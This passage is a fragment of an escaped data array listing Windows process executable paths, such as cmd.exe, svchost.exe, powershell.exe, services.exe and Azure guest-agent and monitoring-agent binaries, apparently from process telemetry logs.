,\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"c:\\\\windows\\\\system32\\\\services.exe\",\"NaN\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestl